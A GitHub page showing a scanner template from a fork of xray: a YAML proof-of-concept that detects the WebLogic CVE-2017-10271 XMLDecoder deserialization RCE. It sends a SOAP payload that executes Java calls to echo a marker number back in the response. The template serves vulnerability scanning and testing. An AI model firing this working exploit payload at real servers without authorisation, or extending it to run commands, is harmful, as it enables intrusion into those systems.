forked from chaitin/xray
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathweblogic-v10-cve-2017-10271.yml
20 lines (20 loc) · 1.46 KB
/
weblogic-v10-cve-2017-10271.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
name: poc-yaml-weblogic-cve-2017-10271
rules:
- method: POST
path: /wls-wsat/CoordinatorPortType
headers:
Content-Type: text/xml
body: >-
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork"><void method="getResponse"><void method="getServletOutputStream"><void method="write"><array class="byte" length="9"><void index="0"><byte>50</byte></void><void index="1"><byte>50</byte></void><void index="2"><byte>53</byte></void><void index="3"><byte>55</byte></void><void index="4"><byte>55</byte></void><void index="5"><byte>51</byte></void><void index="6"><byte>48</byte></void><void index="7"><byte>57</byte></void><void index="8"><byte>49</byte></void></array></void><void method="flush"/></void></void></void></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope></soapenv:Envelope>
follow_redirects: true
expression: >
body.bcontains(b'225773091')
detail:
vulnpath: '/wls-wsat/CoordinatorPortType'
author: fnmsd(https://github.com/fnmsd)
description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2017-10271'
weblogic_version: '10'
links:
- https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
- https://github.com/QAX-A-Team/WeblogicEnvironment
- https://xz.aliyun.com/t/5299